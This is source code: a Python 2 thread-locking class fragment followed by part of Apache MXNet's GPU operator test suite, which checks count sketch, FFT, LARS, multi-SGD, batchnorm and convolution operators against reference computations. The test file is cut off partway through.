class SuccessLock:
def __init__(self):
self.lock = Lock()
self.pause = Lock()
self.code = 0L
self.success = False
self.finished = True
def reset(self):
self.success = False
self.finished = False
def set(self):
self.lock.acquire()
if not self.pause.locked():
self.pause.acquire()
self.first = True
self.code += 1L
self.lock.release()
return self.code
def trip(self, code, s = False):
self.lock.acquire()
try:
if code == self.code and not self.finished:
r = self.first
self.first = False
if s:
self.finished = True
self.success = True
return r
finally:
self.lock.release()
def give_up(self):
self.lock.acquire()
self.success = False
self.finished = True
self.lock.release()
def wait(self):
self.pause.acquire()
def unwait(self, code):
if code == self.code and self.pause.locked():
self.pause.release()
def isfinished(self):
self.lock.acquire()
x = self.finished
self.lock.release()
return x
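# Minimal sketch (in the Python 2 style of this module) of the SuccessLock handshake used by
# rerequest_single() above: the caller registers an attempt and blocks in wait(), while the
# worker thread trips the lock when it has an answer and then wakes the caller up.
#   lock = SuccessLock()
#   lock.reset()
#   code = lock.set()          # register this attempt and remember its code
#   # start the worker thread here, then block until it responds or times out:
#   #   lock.wait()
#   # inside the worker thread, on success:
#   #   if lock.trip(code, True):  # True marks the whole cycle as finished/successful
#   #       lock.unwait(code)      # releases the caller blocked in wait()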
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_extensions import *
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
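# Reference computation used above, for clarity: with hash bucket h[d] and sign s[d],
# the forward count sketch is a[n][k] = sum over dims d with h[d] == k of s[d] * x[n][d],
# and the backward pass routes gradients back as a[n][d] = out_grad[n][h[d]] * s[d],
# which is exactly what the nested loops build before comparing against the operator.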
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
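# A minimal sketch of the NxM expansion above, added for illustration only; the helper is
# never called by the tests and the 'sym*'/'ctx*' strings are hypothetical placeholders.
# It shows why pairing np.repeat(sym_list, M) with ctx_list * N covers every combination.
def _nxm_expansion_sketch():
    syms = ['sym1', 'sym2']
    ctxs = ['ctx1', 'ctx2', 'ctx3']
    expanded_syms = list(np.repeat(syms, len(ctxs)))   # each symbol repeated once per context
    expanded_ctxs = ctxs * len(syms)                   # context list cycled once per symbol
    assert list(zip(expanded_syms, expanded_ctxs)) == [
        ('sym1', 'ctx1'), ('sym1', 'ctx2'), ('sym1', 'ctx3'),
        ('sym2', 'ctx1'), ('sym2', 'ctx2'), ('sym2', 'ctx3')]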
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
